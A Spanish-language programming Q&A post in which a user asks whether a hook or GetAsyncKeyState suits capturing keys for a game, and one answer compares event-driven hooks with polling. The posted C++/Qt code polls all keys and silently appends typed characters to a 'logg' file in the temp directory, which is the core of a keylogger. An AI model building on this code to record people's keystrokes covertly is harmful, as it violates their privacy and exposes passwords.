# Usar keystate o windows hook

Tags: c++

Hola estado aprendiendo a capturar mis teclas para luego poder incluir en mi juego ciertos efectos cuando presiono determinadas teclas. Como puede ser f12 disparar etc.. Lo que quiero saber es que es más recomendable usar un Hook o keystate, yo pienso keystate es menos conflictivo.

```
void Write(QString Filename, QString s)
{
    QFile mFile(Filename);
    if(!mFile.open(QFile::WriteOnly | QIODevice::Text | QIODevice::Append))
    {
        // error
    }
    QTextStream out(&mFile);
    if(s == "65" || s == "97"){
        out << "A" ;
    }
    if(s == "66" || s == "98"){
        out << "B" ;
    }
    if(s == "67" || s == "99"){
        out << "C" ;
    }
    if(s == "68" || s == "100"){
        out << "D" ;
    }
    if(s == "69" || s == "101"){
        out << "E" ;
    }
    if(s == "70" || s == "102"){
        out << "F" ;
    }
    if(s == "71" || s == "103"){
        out << "G" ;
    }
    if(s == "72" || s == "104"){
        out << "H" ;
    }
    if(s == "73" || s == "105"){
        out << "I" ;
    }
    if(s == "74" || s == "106"){
        out << "J" ;
    }
    if(s == "75" || s == "107"){
        out << "K" ;
    }
    if(s == "76" || s == "108"){
        out << "L" ;
    }
    if(s == "77" || s == "109"){
        out << "M" ;
    }
    if(s == "78" || s == "110"){
        out << "N" ;
    }
    if(s == "79" || s == "111"){
        out << "O" ;
    }
    if(s == "80" || s == "112"){
        out << "P" ;
    }
    if(s == "81" || s == "113"){
        out << "Q" ;
    }
    if(s == "82" || s == "114"){
        out << "R" ;
    }
    if(s == "83" || s == "115"){
        out << "S" ;
    }
    if(s == "84" || s == "116"){
        out << "T" ;
    }
    if(s == "85" || s == "117"){
        out << "U" ;
    }
    if(s == "86" || s == "118"){
        out << "V" ;
    }
    if(s == "87" || s == "119"){
        out << "W" ;
    }
    if(s == "88" || s == "120"){
        out << "X" ;
    }
    if(s == "89" || s == "121"){
        out << "Y" ;
    }
    if(s == "90" || s == "122"){
        out << "Z" ;
    }
    if(s == "164" || s == "165"){
        out << "Z" ;
    }
    if(s == "8"){
        out << "*borrar*" ;
    }
    if(s == "13"){
        out << endl;
    }
    if(s == "32"){
        out << " ";
    }
    if(s == "46"){
        out << ".";
    }
    if(s == "45"){
        out << "-";
    }
    if(s == "44"){
        out << ",";
    }
    mFile.flush();
    mFile.close();

}

void MainWindow::escucharTeclas()
{
    /** Esta función comprueba que teclas hay pulsadas y las guarda en un archivo **/
        QString num;
        QString Filename = directorio.tempPath() + "/logg";
        QFile mFile(Filename);
        if(!mFile.open(QFile::WriteOnly | QIODevice::Text | QIODevice::Append))
        {
           // error
        }
        short i = 0;
        for(i = 33; i < 255; i++){
         if(GetAsyncKeyState(i) == -32767)
             num = QString::number(i);

        }
        Write(Filename,num);
}
```

Comment: Usas c++ puro ?

Comment: si prefiero hacerlo con c++ y keystate el hook lo veo mas enrevesado que piensas?

Comment: Y que llevas hecho hasta ahora?

Comment: ¿Para qué sistema operativo?

Answer (score 0):

No es que cual sea mas efectivo, si no que el **Hook** actuará cuando la tecla se presione(evento), en cambio con `GetAsyncKeyState(KEY)`, funcionará solo cuando el iterador llegue a ese punto:

Ejemplo:

```
int main()
{
  while(1)
  {
    Sleep(1);

    if(GetAsyncKeyState(0x41)) // A Mayúscula
        cout << "A presionada!" << endl; 
  }
}
```

No tengo idea de que hook utilizas, pero hay muchos tipos para no hacer algo como lo anterior.